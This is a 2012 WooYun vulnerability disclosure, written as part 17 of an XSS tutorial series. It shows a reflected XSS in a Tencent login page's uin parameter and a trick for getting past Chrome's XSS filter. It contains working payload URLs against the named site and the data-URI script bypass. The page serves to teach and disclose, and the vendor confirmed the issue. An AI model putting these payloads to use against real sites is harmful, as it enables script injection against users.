漏洞概要 关注数(45) 关注此漏洞

缺陷编号: WooYun-2012-16672

漏洞标题: [腾讯实例教程] 那些年我们一起学XSS - 17. XSS过滤器绕过 [通用绕过]

相关厂商: 腾讯

漏洞作者: 心伤的瘦子

提交时间: 2012-12-29 18:00

公开时间: 2013-02-12 18:00

漏洞类型: xss跨站脚本攻击

危害等级: 低

自评Rank: 2

漏洞状态: 厂商已经确认

Tags标签: 反射型xss xss技巧

6人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-12-29: 细节已通知厂商并且等待厂商处理中
2012-12-31: 厂商已经确认,细节仅向厂商公开
2013-01-10: 细节向核心白帽子及相关领域专家公开
2013-01-20: 细节向普通白帽子公开
2013-01-30: 细节向实习白帽子公开
2013-02-12: 细节向公众公开

简要描述:

关于反射型的基本东西,暂时就到这啦,如果后面有什么好的case,再做增补。最近,有些人会问到怎么绕过浏览器的XSS过滤器,所以从这节开始,给出点绕过的例子。当然这些绕过浏览器的方法,不是万能的。不同浏览器,不同场景都会存在差异。满足场景要求时,才可以使用。

IE的一些绕过见乌云上的 @gainover,@sogili 的例子,我们教程就不再提及了。
此文给出的是一个来自sogili分享的chrome下绕过过滤器的方法,在腾讯某处XSS上的应用。

这一类都算是“结合了一定场景”,绕过了浏览器自身的防御机制,具有一定的通用性,我们称为“通用绕过”(瞎起的名字,别在意)。但是在后续版本的浏览器中,这些技巧可能会被浏览器干掉从而失效。再次强调:通用不是全部都行,意思是所适用的场景实际发生的概率比较高!

详细说明:

1. 其实就是个普通的XSS点,uin参数没有对任何字符进行过滤。



http://bangbang.qq.com/php/login?game=roco&uin="><img src=1 onerror=alert(1)>&world=5&roleid=44583443&level=8&role=%2





2. 正是由于这个点什么都没过滤,浏览器自身的防御机制也最好发挥作用,瞧瞧,chrome拦截了。。



picture\4_91.jpg





有的新手,不知道有过滤器的,更是会觉得 “啊,这是怎么回事,怎么不行啊,明明可以的。。”



我们只要看到console里有上面那句,就说明 chrome的过滤器大发神威了!!



3. 我们也看看源码。



picture\7_92.jpg





危害部分被和谐了。



4. 那么怎么绕过呢? 这里直接说方法。



5. 首先要求缺陷点,允许 < , > 。其次,要求缺陷点的后方存在 </script> 标签。 我们看看当前的这个点的代码。



...
<input type="hidden" id="sClientUin" value=""><img src=1 onerror=alert(1)>">
...
<script type="text/javascript" src="http://pingjs.qq.com/tcss.ping.js"></script>
...





6. 可以看到上面的要求均满足。我们就可以使用以下技巧。



<script src=data:,alert(1)<!--





7. 代入到我们的利用代码里。



http://bangbang.qq.com/php/login?game=roco&uin="><script src=data:,alert(1)<!--&world=5&roleid=44583443&level=8&role=%2





这次,我们就成功啦。



picture\10_93.jpg



漏洞证明:

见详细说明

修复方案:

参见教程1

版权声明:转载请注明来源 心伤的瘦子@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-12-31 09:56

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评论

  1. 2012-12-29 18:02 | 陈再胜 ( 实习白帽子 | Rank:70 漏洞数:11 | 微博收收听~~~●﹏●)
    0

    终于大结局了······

  2. 2012-12-29 18:04 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 嘿,我崇拜你们来了)
    0

    @陈再胜 不是大结局,前面只是反射型的说完了,接着还有存储型的。

  3. 2012-12-29 18:06 | 鬼魅羊羔 ( 普通白帽子 | Rank:164 漏洞数:25 | 不许动!我是警察!)
    1

    @心伤的瘦子 @陈再胜 胖子的意思是说,第一季已经结束,第二季马上上映、、天天熬夜挖洞,写教程,胖子自然变瘦子。。。

  4. 2012-12-29 18:28 | Clar ( 实习白帽子 | Rank:5 漏洞数:2 | 当前无)
    0

    这篇应该很精彩!

  5. 2012-12-29 18:28 | se55i0n ( 普通白帽子 | Rank:1156 漏洞数:129 | 我是一名白帽子,简称小白!)
    0

    @心伤的瘦子 大湿呀,出来出呀~

  6. 2012-12-29 19:06 | D&G ( 实习白帽子 | Rank:28 漏洞数:6 | linux 爱好者。低调球发展)
    0

    @心伤的瘦子 @鬼魅羊羔 等第二季了~~

  7. 2012-12-29 19:13 | 0x00de ( 实习白帽子 | Rank:8 漏洞数:5 | 一个二逼,2到家了的小白。)
    0

    又发了

  8. 2012-12-29 19:30 | dyun ( 实习白帽子 | Rank:75 漏洞数:12 )
    0

    哦周末 洞主不是不发么~~~

  9. 2012-12-29 19:52 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 嘿,我崇拜你们来了)
    0

    @dyun 元旦前,是要上班的。 今天还没放假。

  10. 2012-12-29 20:41 | 蟋蟀哥哥 ( 普通白帽子 | Rank:362 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)
    0

    flash xss可以绕过所有浏览器,刚好有个tencent的。。

  11. 2012-12-29 21:29 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 嘿,我崇拜你们来了)
    1

    @蟋蟀哥哥 :) 说不定你手上的,已经被我报了,腾讯还未修复而已,哈。 这里的绕过,只是为了尽可能的增加一些鸡肋XSS的适用性。

  12. 2012-12-29 22:31 | Royal. ( 实习白帽子 | Rank:15 漏洞数:1 | 学习xss)
    0

    求放映地址

  13. 2012-12-30 02:26 | 蟋蟀哥哥 ( 普通白帽子 | Rank:362 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)
    0

    @心伤的瘦子 尼玛。。缺德

  14. 2012-12-30 08:43 | 鬼魅羊羔 ( 普通白帽子 | Rank:164 漏洞数:25 | 不许动!我是警察!)
    0

    @蟋蟀哥哥 二货,有东西赶紧报,小心被截胡的,我就犯二了一次,拍拍的XSS消息走漏了,同一天有三个人同时提交我那个XSS。。我差点抑郁了。。

  15. 2012-12-30 09:30 | px1624 ( 普通白帽子 | Rank:438 漏洞数:57 | 电脑业余爱好者,菜鸟一个,是来交流学习的...)
    0

    @鬼魅羊羔 我的人人网的也被截胡了。。。

  16. 2012-12-30 09:31 | px1624 ( 普通白帽子 | Rank:438 漏洞数:57 | 电脑业余爱好者,菜鸟一个,是来交流学习的...)
    0

    擦 全是腾讯的,这要私藏多少啊。。。

  17. 2012-12-30 12:43 | Errorera ( 普通白帽子 | Rank:112 漏洞数:21 | 我们应该在犯错误的情况下学习!)
    0

    @鬼魅羊羔 @鬼魅羊羔 是拍拍商户后台的编辑器img那里?

  18. 2013-01-30 11:28 | Kaier ( 实习白帽子 | Rank:11 漏洞数:1 )
    0

    终于能看了。嘎嘎